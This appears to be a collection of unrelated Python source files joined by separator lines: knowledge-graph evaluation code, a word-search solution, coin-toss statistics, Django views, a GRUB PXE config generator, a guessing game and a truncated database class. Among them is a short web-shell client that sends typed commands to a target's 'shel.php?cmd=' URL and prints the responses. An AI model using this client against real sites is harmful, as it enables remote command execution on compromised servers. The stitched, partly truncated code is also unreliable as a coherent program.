raise MemoryError(f"The current model can't be evaluated on this hardware with these parameters, as "
f"evaluation batch_size={batch_size} is too big and slicing is not implemented for this "
f"model yet.")
def create_sparse_positive_filter_(
hrt_batch: MappedTriples,
all_pos_triples: torch.LongTensor,
relation_filter: torch.BoolTensor = None,
filter_col: int = 0,
) -> Tuple[torch.LongTensor, torch.BoolTensor]:
"""Compute indices of all positives.
For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
positive triples.
:param hrt_batch: shape: (batch_size, 3)
A batch of triples.
:param all_pos_triples: shape: (num_positive_triples, 3)
All positive triples to base the filtering on.
:param relation_filter: shape: (batch_size, num_positive_triples)
A boolean mask R[i, j] which is True iff the j-th positive triple contains the same relation as the i-th triple
in the batch.
:param filter_col:
The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
corresponds to filtering tail-based.
:return:
- positives, shape: (2, m)
The indices of positives in format [(batch_index, entity_id)].
- the relation filter for re-usage.
"""
if filter_col not in {0, 2}:
raise NotImplementedError(
'This code has only been written for updating head (filter_col=0) or '
f'tail (filter_col=2) mask, but filter_col={filter_col} was given.',
)
if relation_filter is None:
relations = hrt_batch[:, 1:2]
relation_filter = (all_pos_triples[:, 1:2]).view(1, -1) == relations
# Split batch
other_col = 2 - filter_col
entities = hrt_batch[:, other_col:other_col + 1]
entity_filter_test = (all_pos_triples[:, other_col:other_col + 1]).view(1, -1) == entities
filter_batch = (entity_filter_test & relation_filter).nonzero(as_tuple=False)
filter_batch[:, 1] = all_pos_triples[:, filter_col:filter_col + 1].view(1, -1)[:, filter_batch[:, 1]]
return filter_batch, relation_filter
def create_dense_positive_mask_(
    zero_tensor: torch.FloatTensor,
    filter_batch: torch.LongTensor,
) -> torch.FloatTensor:
    """Construct dense positive mask.

    Writes, *in-place*, a 1 at every (batch_index, entity_id) coordinate listed in
    filter_batch, and returns the very same tensor.

    :param zero_tensor: shape: (batch_size, num_entities)
        A tensor of zeros of suitable shape.
    :param filter_batch: shape: (m, 2)
        The indices of all positives in format (batch_index, entity_id)
    :return:
        The dense positive mask with x[b, i] = 1 iff (b, i) in filter_batch.
    """
    batch_indices, entity_ids = filter_batch[:, 0], filter_batch[:, 1]
    zero_tensor[batch_indices, entity_ids] = 1
    return zero_tensor
def filter_scores_(
    scores: torch.FloatTensor,
    filter_batch: torch.LongTensor,
) -> torch.FloatTensor:
    """Filter scores by setting true scores to NaN.

    :param scores: shape: (batch_size, num_entities)
        The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*.
    :param filter_batch: (m, 2)
        The indices of all positives.
    :return:
        A reference to the scores, which have been updated in-place.
    """
    num_entities = scores.shape[1]

    # Mask known positives with NaN so they drop out of subsequent rank computations.
    scores[filter_batch[:, 0], filter_batch[:, 1]] = float('nan')

    # A row that became all-NaN means every candidate entity was filtered away; warn about it.
    fully_filtered_rows = torch.isnan(scores).sum(dim=1) == num_entities
    if fully_filtered_rows.any():
        logger.warning(
            "User selected filtered metric computation, but all corrupted triples exists also as positive "
            "triples",
        )

    return scores
def evaluate(
    model: Model,
    mapped_triples: MappedTriples,
    evaluators: Union[Evaluator, Collection[Evaluator]],
    only_size_probing: bool = False,
    batch_size: Optional[int] = None,
    slice_size: Optional[int] = None,
    device: Optional[torch.device] = None,
    squeeze: bool = True,
    use_tqdm: bool = True,
    tqdm_kwargs: Optional[Mapping[str, str]] = None,
    restrict_entities_to: Optional[torch.LongTensor] = None,
    do_time_consuming_checks: bool = True,
) -> Union[MetricResults, List[MetricResults]]:
    """Evaluate metrics for model on mapped triples.

    The model is used to predict scores for all tails and all heads for each triple. Subsequently, each abstract
    evaluator is applied to the scores, also receiving the batch itself (e.g. to compute entity-specific metrics).
    Thereby, the (potentially) expensive score computation against all entities is done only once. The metric evaluators
    are expected to maintain their own internal buffers. They are returned after running the evaluation, and should
    offer a possibility to extract some final metrics.

    :param model:
        The model to evaluate.
    :param mapped_triples:
        The triples on which to evaluate. The mapped triples should never contain inverse triples - these are created by
        the model class on the fly.
    :param evaluators:
        An evaluator or a list of evaluators working on batches of triples and corresponding scores.
    :param only_size_probing:
        The evaluation is only performed for two batches to test the memory footprint, especially on GPUs.
    :param batch_size: >0
        A positive integer used as batch size. Generally chosen as large as possible. Defaults to 1 if None.
    :param slice_size: >0
        The divisor for the scoring function when using slicing.
    :param device:
        The device on which the evaluation shall be run. If None is given, use the model's device.
    :param squeeze:
        Return a single instance of :class:`MetricResults` if only one evaluator was given.
    :param use_tqdm:
        Should a progress bar be displayed?
    :param restrict_entities_to:
        Optionally restrict the evaluation to the given entity IDs. This may be useful if one is only interested in a
        part of the entities, e.g. due to type constraints, but wants to train on all available data. For ranking the
        entities, we still compute all scores for all possible replacement entities to avoid irregular access patterns
        which might decrease performance, but the scores with afterwards be filtered to only keep those of interest.
        If provided, we assume that the triples are already filtered, such that it only contains the entities of
        interest.
    :param do_time_consuming_checks:
        Whether to perform some time consuming checks on the provided arguments. Currently, this encompasses:
        - If restrict_entities_to is not None, check whether the triples have been filtered.
        Disabling this option can accelerate the method.
    :return:
        The finalized results of the given evaluators; a single result object instead of a list if ``squeeze`` is
        True and exactly one evaluator was given.
    :raises ValueError:
        If ``restrict_entities_to`` is given, checks are enabled, and ``mapped_triples`` contains entities outside
        of the restriction.
    """
    if isinstance(evaluators, Evaluator):  # upgrade a single evaluator to a list
        evaluators = [evaluators]

    start = timeit.default_timer()

    # verify that the triples have been filtered
    if restrict_entities_to is not None and do_time_consuming_checks:
        present_entity_ids = get_entities(triples=mapped_triples)
        unwanted = present_entity_ids.difference(restrict_entities_to.tolist())
        if len(unwanted) > 0:
            raise ValueError(f'mapped_triples contains IDs of entities which are not contained in restrict_entities_to:'
                             f'{unwanted}. This will invalidate the evaluation results.')

    # Send to device
    if device is not None:
        model = model.to(device)
    device = model.device

    # Ensure evaluation mode
    model.eval()

    # Split evaluators into those which need unfiltered results, and those which require filtered ones
    filtered_evaluators = list(filter(lambda e: e.filtered, evaluators))
    unfiltered_evaluators = list(filter(lambda e: not e.filtered, evaluators))

    # Check whether we need to be prepared for filtering
    filtering_necessary = len(filtered_evaluators) > 0

    # Check whether an evaluator needs access to the masks
    # This can only be an unfiltered evaluator.
    positive_masks_required = any(e.requires_positive_mask for e in unfiltered_evaluators)

    # Prepare for result filtering
    # Training triples count as known positives too, hence the concatenation.
    if filtering_necessary or positive_masks_required:
        all_pos_triples = torch.cat([model.triples_factory.mapped_triples, mapped_triples], dim=0)
        all_pos_triples = all_pos_triples.to(device=device)
    else:
        all_pos_triples = None

    # Send tensors to device
    mapped_triples = mapped_triples.to(device=device)

    # Prepare batches
    if batch_size is None:
        # This should be a reasonable default size that works on most setups while being faster than batch_size=1
        batch_size = 32
        logger.info(f"No evaluation batch_size provided. Setting batch_size to '{batch_size}'.")
    batches = cast(Iterable[np.ndarray], split_list_in_batches_iter(input_list=mapped_triples, batch_size=batch_size))

    # Show progressbar
    num_triples = mapped_triples.shape[0]

    # Flag to check when to quit the size probing
    evaluated_once = False

    # Disable gradient tracking
    _tqdm_kwargs = dict(
        desc=f'Evaluating on {model.device}',
        total=num_triples,
        unit='triple',
        unit_scale=True,
        # Choosing no progress bar (use_tqdm=False) would still show the initial progress bar without disable=True
        disable=not use_tqdm,
    )
    if tqdm_kwargs:
        _tqdm_kwargs.update(tqdm_kwargs)
    with optional_context_manager(use_tqdm, tqdm(**_tqdm_kwargs)) as progress_bar, torch.no_grad():
        # batch-wise processing
        for batch in batches:
            batch_size = batch.shape[0]
            relation_filter = None
            # Score both head replacement (column 0) and tail replacement (column 2) for the batch.
            for column in (0, 2):
                relation_filter = _evaluate_batch(
                    batch=batch,
                    model=model,
                    column=column,
                    filtered_evaluators=filtered_evaluators,
                    unfiltered_evaluators=unfiltered_evaluators,
                    slice_size=slice_size,
                    all_pos_triples=all_pos_triples,
                    relation_filter=relation_filter,
                    restrict_entities_to=restrict_entities_to,
                    positive_masks_required=positive_masks_required,
                    filtering_necessary=filtering_necessary,
                )

            # If we only probe sizes we do not need more than one batch
            if only_size_probing and evaluated_once:
                break

            evaluated_once = True

            if use_tqdm:
                progress_bar.update(batch_size)

        # Finalize
        results = [evaluator.finalize() for evaluator in evaluators]

    stop = timeit.default_timer()
    if only_size_probing:
        logger.debug("Evaluation took %.2fs seconds", stop - start)
    else:
        logger.info("Evaluation took %.2fs seconds", stop - start)

    if squeeze and len(results) == 1:
        return results[0]

    return results
def _evaluate_batch(
    batch: MappedTriples,
    model: Model,
    column: int,
    filtered_evaluators: Collection[Evaluator],
    unfiltered_evaluators: Collection[Evaluator],
    slice_size: Optional[int],
    all_pos_triples: Optional[MappedTriples],
    relation_filter: Optional[torch.BoolTensor],
    restrict_entities_to: Optional[torch.LongTensor],
    positive_masks_required: bool,
    filtering_necessary: bool,
) -> torch.BoolTensor:
    """
    Evaluate batch for all head predictions(column=0), or all tail predictions (column=2).

    :param batch: shape: (batch_size, 3)
        The batch of currently evaluated triples.
    :param model:
        The model to evaluate.
    :param column:
        The column which to evaluate. Either 0 for head prediction, or 2 for tail prediction.
    :param filtered_evaluators:
        The evaluators which work on filtered scores.
    :param unfiltered_evaluators:
        The evaluators which work on unfiltered scores.
    :param slice_size:
        An optional slice size for computing the scores.
    :param all_pos_triples:
        All positive triples (required if filtering is necessary).
    :param relation_filter:
        The relation filter. Can be re-used.
    :param restrict_entities_to:
        Restriction to evaluate only for these entities.
    :param positive_masks_required:
        Whether dense positive masks are required (by any unfiltered evaluator).
    :param filtering_necessary:
        Whether filtering is necessary.
    :return:
        The relation filter, which can be re-used for the same batch.
    :raises ValueError:
        If ``column`` is not 0 or 2, or if filtering is requested without ``all_pos_triples``.
    """
    if column not in {0, 2}:
        raise ValueError(f'column must be either 0 or 2, but is column={column}')

    # Predict scores once
    if column == 2:  # tail scores
        batch_scores_of_corrupted = model.predict_t(batch[:, 0:2], slice_size=slice_size)
    else:
        batch_scores_of_corrupted = model.predict_h(batch[:, 1:3], slice_size=slice_size)

    # Select scores of true
    batch_scores_of_true = batch_scores_of_corrupted[
        torch.arange(0, batch.shape[0]),
        batch[:, column],
    ]

    # Bug fix: always bind these names. Previously, when neither filtering nor dense
    # masks were required, positive_mask was undefined, which raised a NameError
    # below (and a TypeError when restrict_entities_to tried to slice None).
    positive_filter = None
    positive_mask = None

    # Create positive filter for all corrupted
    if filtering_necessary or positive_masks_required:
        # Needs all positive triples
        if all_pos_triples is None:
            # Bug fix: message typo 'of' -> 'or'.
            raise ValueError('If filtering_necessary or positive_masks_required is True, all_pos_triples has to be '
                             'provided, but is None.')

        # Create filter
        positive_filter, relation_filter = create_sparse_positive_filter_(
            hrt_batch=batch,
            all_pos_triples=all_pos_triples,
            relation_filter=relation_filter,
            filter_col=column,
        )

        # Create a positive mask with the size of the scores from the positive filter
        if positive_masks_required:
            positive_mask = create_dense_positive_mask_(
                zero_tensor=torch.zeros_like(batch_scores_of_corrupted),
                filter_batch=positive_filter,
            )

    # Restrict to entities of interest
    if restrict_entities_to is not None:
        batch_scores_of_corrupted_ = batch_scores_of_corrupted[:, restrict_entities_to]
        # Bug fix: the mask is None when no unfiltered evaluator requested it;
        # only restrict it when it actually exists.
        if positive_mask is not None:
            positive_mask = positive_mask[:, restrict_entities_to]
    else:
        batch_scores_of_corrupted_ = batch_scores_of_corrupted

    # Evaluate metrics on these *unfiltered* scores
    for unfiltered_evaluator in unfiltered_evaluators:
        if column == 2:  # tail scores
            process = unfiltered_evaluator.process_tail_scores_
        else:
            process = unfiltered_evaluator.process_head_scores_
        process(
            hrt_batch=batch,
            true_scores=batch_scores_of_true[:, None],
            scores=batch_scores_of_corrupted_,
            dense_positive_mask=positive_mask,
        )

    # Filter
    if filtering_necessary:
        batch_filtered_scores_of_corrupted = filter_scores_(
            scores=batch_scores_of_corrupted,
            filter_batch=positive_filter,
        )

        # The scores for the true triples have to be rewritten to the scores tensor
        batch_filtered_scores_of_corrupted[
            torch.arange(0, batch.shape[0]),
            batch[:, column],
        ] = batch_scores_of_true

        # Restrict to entities of interest
        if restrict_entities_to is not None:
            batch_filtered_scores_of_corrupted = batch_filtered_scores_of_corrupted[:, restrict_entities_to]

        # Evaluate metrics on these *filtered* scores
        for filtered_evaluator in filtered_evaluators:
            if column == 2:  # tail scores
                process = filtered_evaluator.process_tail_scores_
            else:
                process = filtered_evaluator.process_head_scores_
            process(
                hrt_batch=batch,
                true_scores=batch_scores_of_true[:, None],
                scores=batch_filtered_scores_of_corrupted,
            )

    return relation_filter
|
#!/usr/bin/env python3
class Solution(object):
    """Word Search: decide whether ``word`` can be traced through orthogonally
    adjacent cells of ``board``, using each cell at most once per path."""

    def exist(self, board, word):
        """
        :type board: List[List[str]]
        :type word: str
        :rtype: bool
        """
        if not board:
            return False
        rows, cols = len(board), len(board[0])
        for r in range(rows):
            for c in range(cols):
                if self.dfs(board, r, c, word):
                    return True
        return False

    def dfs(self, board, i, j, word):
        # Every character matched: the word exists.
        if len(word) == 0:
            return True
        # Out of bounds, or the current cell does not match the next character.
        if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]) or word[0] != board[i][j]:
            return False
        saved = board[i][j]
        board[i][j] = "#"  # mark visited so the cell is not reused on this path
        found = any(
            self.dfs(board, i + di, j + dj, word[1:])
            for di, dj in ((1, 0), (-1, 0), (0, 1), (0, -1))
        )
        board[i][j] = saved  # backtrack
        return found
if __name__ == "__main__":
    # Smoke test: "ABCCED" traces a connected path through the grid, so this prints True.
    solver = Solution()
    grid = [["A", "B", "C", "E"], ["S", "F", "C", "S"], ["A", "D", "E", "E"]]
    print(solver.exist(grid, "ABCCED"))
|
#Courtney Peterson
#CSCI2244: Randomness and Computation
from __future__ import print_function, division
import numpy as np # this is a universal shorthand for numpy
import matplotlib.pyplot as plt
def run_lengths(n, p):
    """ This returns a list of the run lengths in n tosses of a coin whose heads probability is p.

    Arguments:
    n--Number of tosses (a positive int),
    p--The probability of observing heads for any given toss (float between 0 and 1).
    """
    from itertools import groupby

    # 'T' is drawn with probability p (heads), 'F' with 1 - p (tails).
    tosses = np.random.choice(['T', 'F'], p=[p, 1 - p], size=n)
    # groupby collapses each maximal run of equal tosses into one group.
    # Bug fix: the previous manual loop returned [1] for n == 0; an empty
    # sequence of tosses has no runs, so [] is returned instead.
    return [len(list(group)) for _, group in groupby(tosses)]
def draw_hist_longest_run(n, p, trial_num, cumulative=False):
    """Draws a histogram of the maximum run length in n tosses of
    a coin with a heads probability p.

    Arguments:
    n--Number of tosses (a positive int),
    p--The probability of observing heads for any given toss
        (float between 0 and 1),
    trial_num--Number of trials used to create the histogram
        (positive int),
    cumulative--A flag to switch the histogram between cumulative
        and non-cumulative modes (bool).
    """
    # One maximum run length per trial.
    total_runs_max = []
    for i in range(0, trial_num):
        total_runs_max.append(max(run_lengths(n, p)))
    # "bins" for the histogram (bar chart). We get a column chart of the number
    # of elements in between each successive pair of bin markers.
    bins = np.arange(-.5, n + 1.5)
    fig = plt.figure()
    # setting zorder to 3 brings the histogram to the front
    plt.hist(total_runs_max, bins, color="g", cumulative=cumulative, zorder=3)
    plt.xlim(-1, 50)
    plt.title(('Max run length of {:d} tosses '.format(n) + 'of a coin {:d} times '.format(trial_num) +
               'with heads probability of {:}'.format(p)))
    # Bug fix: the x-axis shows the longest run length, not a heads count.
    plt.xlabel('Maximum Run Length')
    # Typo fix: Occurences -> Occurrences.
    plt.ylabel('Number of Occurrences')
    plt.grid(axis='both', zorder=1)  # push the grid lines to the back
    fig.savefig('Fig1.png')
    return None
def draw_hist_num_runs(n, p, trial_num, cumulative=False):
    """Draws a histogram of the number of runs in n tosses of a
    coin with a heads probability p.

    Arguments:
    n--Number of tosses (a positive int),
    p--The probability of observing heads for any given toss
        (float between 0 and 1),
    trial_num--Number of trials used to create the histogram
        (positive int),
    cumulative--A flag to switch the histogram between cumulative
        and non-cumulative modes (bool).
    """
    # One run count per trial: the length of the run-lengths list.
    total_runs_len = []
    for i in range(0, trial_num):
        total_runs_len.append(len(run_lengths(n, p)))
    # "bins" for the histogram (bar chart). We get a column chart of the number
    # of elements in between each successive pair of bin markers.
    bins = np.arange(-.5, n + 1.5)
    fig = plt.figure()
    # setting zorder to 3 brings the histogram to the front
    plt.hist(total_runs_len, bins, color="g", cumulative=cumulative, zorder=3)
    plt.xlim(-1, 50)
    plt.title(('{:d} tosses of '.format(n) + '{:d} coins with '.format(trial_num) +
               'success probability {:}'.format(p)))
    plt.xlabel('Number of Runs')
    # Typo fix: Occurences -> Occurrences.
    plt.ylabel('Number of Occurrences')
    plt.grid(axis='both', zorder=1)  # push the grid lines to the back
    fig.savefig('Fig2.png')
    return None
# Generate Figure 1: distribution of the longest run in 300 tosses of a fair
# coin, estimated over 5000 trials.
draw_hist_longest_run(300, .5, 5000, cumulative=False)
plt.show()
# Additional experiments (Figure 2), kept disabled for reference:
#draw_hist_num_runs(50, .5, 5000, cumulative=False)
#draw_hist_num_runs(50, .2, 5000, cumulative=False)
#plt.show()
|
from urllib2 import HTTPError
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound
from django.views.decorators.csrf import csrf_exempt
from django.conf import settings
from myproject.gcm import beats
from myproject.gcm.models import Device, Song, Cluster, Event
from myproject.gcm.api import send_gcm_message, parse_gcm_result
def parse_song(file_name, recreate=True):
    """Create a Song record for the given file name and persist it.

    The ``recreate`` flag is forwarded to ``Song.save``.
    """
    song = Song(song_name=file_name)
    song.save(recreate=recreate)
@csrf_exempt
def device(request):
    """
    Register device

    Args:
        database_id - previous reg_id
        reg_id - reg id from android app
        cluster_id - cluster_id of device
    """
    # database_id is the registration id the client previously knew; it is the
    # lookup key for the Device row.
    database_id = request.POST.get('database_id', None)
    if not database_id:
        return HttpResponseBadRequest()
    device, created = Device.objects.get_or_create(reg_id=database_id)
    # NOTE(review): only a pre-existing device is updated with the new reg_id /
    # cluster_id; a freshly created row keeps database_id as its reg_id and is
    # never explicitly saved with the posted fields. Presumably intentional for
    # first registration -- confirm against the Android client.
    if not created:
        device.reg_id = request.POST.get('reg_id')
        device.is_active = True
        device.cluster_id = request.POST.get('cluster_id')
        device.save()
    return HttpResponse()
@csrf_exempt
def delete(request):
    """
    Unregister device

    Args:
        database_id - id of device to be deleted
    """
    database_id = request.POST.get('database_id', None)
    if not database_id:
        return HttpResponseNotFound()
    try:
        device = Device.objects.get(reg_id=database_id)
        device.delete()
    except Exception:
        # Narrowed from a bare ``except:`` so system-exiting exceptions
        # (KeyboardInterrupt, SystemExit) are no longer swallowed. The common
        # case here is Device.DoesNotExist when no device matches database_id.
        return HttpResponseBadRequest()
    return HttpResponse()
@csrf_exempt
def cluster(request, debug=False):
    """
    Assign a new cluster to the device that sent this request.

    Assumption: There is only 1 event in the database. Later on match
    the cluster to an event.
    """
    event = Event.objects.get(event_name='CPSC434 Presentation')
    song = event.current_song
    # Beat data of the current song; presumably a dict mapping some key to a
    # (frequency, weight) pair -- confirm against Song.get_beats().
    song_data = song.get_beats()
    try:
        device = Device.objects.get(reg_id=request.POST.get('database_id', 0))
    except:
        return HttpResponseNotFound()
    # New cluster id = current cluster count (simple sequential scheme).
    newid = str(Cluster.objects.count()) # Make a more intelligent scheme later
    ncluster = Cluster(cluster_id=newid, event=event)
    device.cluster_id = newid
    device.save(force_update=True)
    # Rank the beat entries by the second tuple element (descending) and pick
    # one round-robin by the numeric cluster id.
    data = sorted(song_data.iteritems(), key=lambda x: x[1][1], reverse=True) # Again a more intelligent scheme later
    freq = int(data[int(newid)%len(data)][1][0])
    if debug:
        print 'Data:', data
        print 'Freq:', freq
    msg = {'frequency': freq, 'cluster': newid}
    if debug:
        print 'Sending message:', msg
    ncluster.frequency = freq
    # NOTE(review): Cluster.save is called with (msg, debug) -- a custom
    # override that presumably also dispatches the GCM message; confirm in
    # myproject.gcm.models.
    ncluster.save(msg, debug)
    return HttpResponse()
|
#! /usr/bin/env python2
# -*- coding: utf-8 -*-
#
from string import Template
import os
import urllib2
class Menuentry(object):
    """A single GRUB ``menuentry`` stanza for a PXE netboot kernel.

    :param menuentry: title shown in the GRUB menu (required).
    :param path: directory (relative to the TFTP root) holding the kernel files.
    :param vmlinuz: kernel file name (required).
    :param options: kernel command line; None is treated as "".
    :param initrd: initrd file name (required).
    :param chroot: local TFTP/grub root directory on disk.
    :raises ValueError: if menuentry, vmlinuz or initrd is None.
    """

    def __init__(self, menuentry, path, vmlinuz, options, initrd, chroot="/home/pxe/tftp/grub"):
        if menuentry is None or vmlinuz is None or initrd is None:
            # Bug fix: this used a bare ``raise`` with no active exception,
            # which itself fails with "No active exception to reraise".
            raise ValueError("menuentry, vmlinuz and initrd are all required")
        self.menuentry = menuentry
        self.path = path
        self.vmlinuz = vmlinuz
        self.options = "" if options is None else options
        self.initrd = initrd
        self.chroot = chroot

    def __str__(self):
        # safe_substitute leaves unknown placeholders untouched instead of raising.
        tempT = """
menuentry "$menuentry" {
    linux $vmlinuz $options
    initrd $initrd
}
"""
        tempTemplate = Template(tempT)
        return tempTemplate.safe_substitute(
            menuentry=self.menuentry,
            vmlinuz=os.path.join(self.path, self.vmlinuz),
            options=self.options,
            initrd=os.path.join(self.path, self.initrd),
        )
class deepin_dailylive_next_menuentry(Menuentry):
    # GRUB entry for the Deepin "next" daily live image: scrapes the build
    # timestamp from the cdimage server and mirrors vmlinuz/initrd locally.
    def __init__(self):
        self.menuentry="Deepin Dailylive Next"
        self.path="/live-boot/deepin-next/caser"
        self.vmlinuz="vmlinuz"
        self.options="boot=casper netboot=nfs nfsroot=10.0.0.6:/nfsroot/deepin-next/desktop/current/amd64/ quiet splash locale=zh_CN"
        self.initrd="initrd.lz"
        super(deepin_dailylive_next_menuentry,self).__init__(self.menuentry, self.path,self.vmlinuz, self.options, self.initrd)
        # Download the current kernel/initrd and stamp the entry title.
        self.valicate()

    def _get_timestamp(self, url):
        # Scrape the vmlinuz row of the HTTP directory listing at ``url`` and
        # return its modification time as "(YYYYMMDD HH:MM)", or None on any
        # network/parse failure.
        import re
        import time
        try:
            page = urllib2.urlopen(url)
        except:
            return None
        if page.getcode() != 200:
            return None
        timestr=None
        for i in page.readlines():
            # Matches e.g. '<a ...>vmlinuz</a>   01-Jan-2020 12:34   1234'.
            m = re.match(r"<a.*>vmlinuz.*</a>\s+(.*\s\S*)\s+.+", i)
            if m:
                timestr=m.group(1).strip()
                break
        if timestr is None:
            return None
        timestruct=time.strptime(timestr, "%d-%b-%Y %H:%M")
        timestamp=time.strftime("(%Y%m%d %H:%M)",timestruct)
        return timestamp

    def download(self, url, savepath):
        # Fetch ``url`` and write the body to ``savepath`` (binary mode);
        # any failure is propagated to the caller.
        try:
            r=urllib2.urlopen(url)
            f=open(savepath,'wb')
            f.write(r.read())
            f.close()
        except:
            raise

    def valicate(self, url="http://cdimage/nfsroot/deepin-next/desktop/current/amd64/casper"):
        # (sic: "validate") Refresh the local copies of vmlinuz/initrd from the
        # server and append the build timestamp to the menu title.
        # NOTE(review): returns False on failure and None (implicitly) on
        # success -- callers must not rely on a truthy success value.
        timestamp=self._get_timestamp(url)
        if not timestamp:
            return False
        _real_root_path = os.path.join(self.chroot, self.path.lstrip('/'))
        if not os.path.exists(_real_root_path):
            print "Make dirs %s" % _real_root_path
            os.makedirs(_real_root_path)
        # Remove stale copies before re-downloading.
        if os.path.exists(os.path.join(_real_root_path, self.vmlinuz)):
            os.unlink(os.path.join(_real_root_path,self.vmlinuz))
        if os.path.exists(os.path.join(_real_root_path, self.initrd)):
            os.unlink(os.path.join(_real_root_path,self.initrd))
        try:
            self.download(url+'/vmlinuz', os.path.join(_real_root_path, self.vmlinuz))
            self.download(url+'/initrd.lz', os.path.join(_real_root_path, self.initrd))
        except:
            return False
        self.menuentry+=" %s" % timestamp

    def __str__(self):
        # Render two stanzas: the plain live entry plus a LiveInstaller variant.
        tempT = """
menuentry "$menuentry" {
    linux $vmlinuz $options
    initrd $initrd
}
menuentry "LiveInstaller $menuentry" {
    linux $vmlinuz $options livecd-installer
    initrd $initrd
}
"""
        tempTemplate = Template(tempT)
        return tempTemplate.safe_substitute(menuentry=self.menuentry, vmlinuz=os.path.join(self.path,self.vmlinuz), options=self.options, initrd=os.path.join(self.path,self.initrd))
class Submenu():
    """A named GRUB submenu whose entries are rendered inside braces."""

    def __init__(self, name):
        self.name = name
        self.menuentry = []

    def get_menuentry(self):
        """Return the list of entries added so far."""
        return self.menuentry

    def append(self, menuentry):
        """Add one entry (anything whose str() is a GRUB stanza)."""
        self.menuentry.append(menuentry)

    def __str__(self):
        rendered = "".join(str(entry) for entry in self.get_menuentry())
        return 'submenu "%s" {' % self.name + rendered + "}"
class GrubCfg():
    """Top-level grub.cfg document: a flat sequence of entries/submenus."""

    def __init__(self):
        self.entry = []

    def get_entry(self):
        """Return the list of top-level entries."""
        return self.entry

    def append(self, entry):
        """Add one top-level entry or submenu."""
        self.entry.append(entry)

    def __str__(self):
        return "".join(str(entry) for entry in self.get_entry())
# Build the grub.cfg document: one submenu holding the daily-live entry, then
# print the rendered configuration to stdout (Python 2 print statement).
grubcfg=GrubCfg()
menus=Submenu('Deepin live Next')
daily_live_next=deepin_dailylive_next_menuentry()
menus.append(daily_live_next)
grubcfg.append(menus)
print grubcfg
|
from django.http import HttpResponseNotAllowed, HttpResponse, HttpResponseForbidden
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.db.models import get_model
from poster.encode import multipart_encode, MultipartParam
from poster.streaminghttp import register_openers
from metadatadb.proxy import proxyRequest, can_edit
from metadatadb.config import metadataServerUrl
import urllib2
Resource = get_model('registry', 'Resource')
def allFiles(req, resourceId):
    # Dispatch for the file collection of a metadata record:
    # GET lists the record's files, POST uploads a new one.
    # NOTE(review): the nested-function layout (including @login_required on the
    # inner newFile) is reconstructed from the dispatch below, which closes over
    # ``req`` -- confirm against the original module.
    allowed = [ 'GET', 'POST' ]
    if req.method not in allowed:
        return HttpResponseNotAllowed(allowed)

    def getFiles(req, resourceId):
        # Proxy the file listing from the metadata server if the user may view
        # the resource.
        res = get_object_or_404(Resource, metadata_id=resourceId)
        if res.can_view(req.user):
            kwargs = {
                'path': '/metadata/record/' + resourceId + '/file/',
                'method': req.method
            }
            return proxyRequest(**kwargs)
        else:
            return HttpResponseForbidden('You cannot view this resource.')

    @login_required # Registry tracking required?
    def newFile(req, resourceId):
        # Stream the uploaded file to the metadata server as multipart form
        # data, and mirror the upstream status/Location back to the client.
        if not can_edit(req.user, resourceId):
            return HttpResponseForbidden('You do not have permission to edit this resource')
        # poster: install streaming-capable urllib2 openers.
        register_openers()
        theFile = req.FILES['upload-file']
        kwargs = {
            'name': 'upload-file',
            'filename': theFile.name,
            'filetype': theFile.content_type,
            'filesize': theFile.size,
            'fileobj': theFile
        }
        params = MultipartParam(**kwargs)
        datagen, headers = multipart_encode([ params ])
        url = '/'.join([ metadataServerUrl, 'metadata/record', resourceId, 'file/' ])
        request = urllib2.Request(url, datagen, headers)
        response = urllib2.urlopen(request)
        clientResponse = HttpResponse()
        clientResponse.status_code = response.code
        clientResponse['Location'] = response.info()['Location']
        return clientResponse

    if req.method == 'GET': return getFiles(req, resourceId)
    if req.method == 'POST': return newFile(req, resourceId)
import time
import requests
import sys
# Interactive client for a remote web shell endpoint (Python 2): each typed
# command is sent as the ?cmd= query parameter and the response body printed.
# NOTE(review): offensive-security tooling -- only for use against targets you
# are authorized to test.
if len(sys.argv) < 2:
    print "\n[!] Use: remote.py https://target.com/shel.php\n"
    sys.exit()
i = sys.argv[1]
print "~ Exploit To "+i
print ""
time.sleep(3)
while True:
    try:
        c = raw_input("sxc@"+i+":~$ ")
        r = requests.get(i+"?cmd="+c)
        print r.text
    except Exception:
        # Any failure (bad URL, connection error, EOF) ends the session.
        print "cek url"
        break
|
"""
随机指定一个1到100之间的随机数,
给出一个数:大了,显示"太大了";小了,显示"太小了"
直到猜对为止,猜对之后显示猜了几次,并问还要继续猜吗?
"""
import random
import sys
# Number guessing game: pick a random 1..100, report too big / too small until
# the player guesses it, then offer another round.
while True:
    unkown_number = random.randint(1, 100)
    guess_count = 0
    guess_flg = True
    while guess_flg:
        print("please input a number:")
        input_str = input()
        guess_count += 1
        try:
            input_number = int(input_str)
        except Exception as e:
            # Non-numeric input: show the error and prompt again.
            print(e)
            print("please input again:")
        else:
            if input_number == unkown_number:
                guess_flg = False
                print("you got it, the number is {}. guess_count:{}".format(unkown_number, guess_count))
                print("if you want to play again , please input yes.")
                again_input = input()
                if again_input == "yes":
                    pass
                else:
                    sys.exit(1)
            # Bug fix: these comparisons previously ran even after a correct
            # guess (always printing "太小了"); elif limits them to wrong guesses.
            elif input_number > unkown_number:
                print("太大了")
            else:
                print("太小了")
|
# Implements db interfaces
# Mostly contains code that are used internally only
import pymysql as MySQLdb
import pandas as pd
class SeqDB(object):
"""
Motifmap SeqDB interface
"""
def __init__(self, dbp, ref):
import motifmap.motifmapcore as motifmapcore
import numpy as np
print """Please note that this module requires a correct \
working directory as MotifMap uses relative paths only.\
If you see C++ exception check your paths."""
self.db = motifmapcore.seqdb()
self.db.load(dbp, ref)
return
def get_seq(self, chrom, start, end):
if type (chrom)!= str or type(start)!=int or type(end)!=int:
raise TypeError("Query value type error")
return self.db.get(chrom, start,end)
def moods_score(self,seq,mat, bg, thr):
if len (mat[0])==4:
mat = list(np.array(mat).transpose())
MATRIX = motifmapcore.DoubleMat()
for row in mat:
d=motifmapcore.DoubleVec()
for ele in row:
d.append(ele)
MATRIX.append(d)
BACKGROUND = motifmapcore.DoubleVec()
for ele in bg:
BACKGROUND.append(ele)
